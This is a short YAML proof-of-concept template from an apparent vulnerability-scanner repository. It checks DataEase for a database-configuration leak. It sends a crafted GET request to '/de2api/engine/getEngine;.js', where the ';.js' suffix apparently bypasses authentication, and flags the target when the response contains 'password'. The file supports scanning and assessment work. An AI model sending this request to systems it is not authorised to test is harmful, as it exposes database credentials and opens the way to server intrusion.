Poc_Scanner/poc/Other-Poc/DataEase-de2api-InfoLeak.yaml
2024-10-09 15:15:50 +08:00

30 lines
1.1 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

keyword: DataEase
name: DataEase数据库配置信息泄露漏洞
description: | # 下一行可填写漏洞描述
DataEase存在数据库配置信息暴露漏洞
requests: # 为空代表默认或者不启用
path: "/de2api/engine/getEngine;.js"
method: GET
headers:
Accept: '*/*'
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
Referer: https://www.baidu.com
Accept-Encoding: gzip, deflate
Connection: keep-alive
body-raw: |- # 如果需要发送请求体,在下一行开始填写
response:
path: "" # 不填则默认接收此请求的响应包
status-code: 200
body: "password" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
time: # 此处填写响应包响应时间,默认不启用
headers:
Server:
Content-type:
Content-length:
Date:
Connection:
impact: | # 下一行可填写漏洞影响
DataEase存在数据库配置信息暴露漏洞可能导致数据库密码泄露严重时可导致服务器被入侵。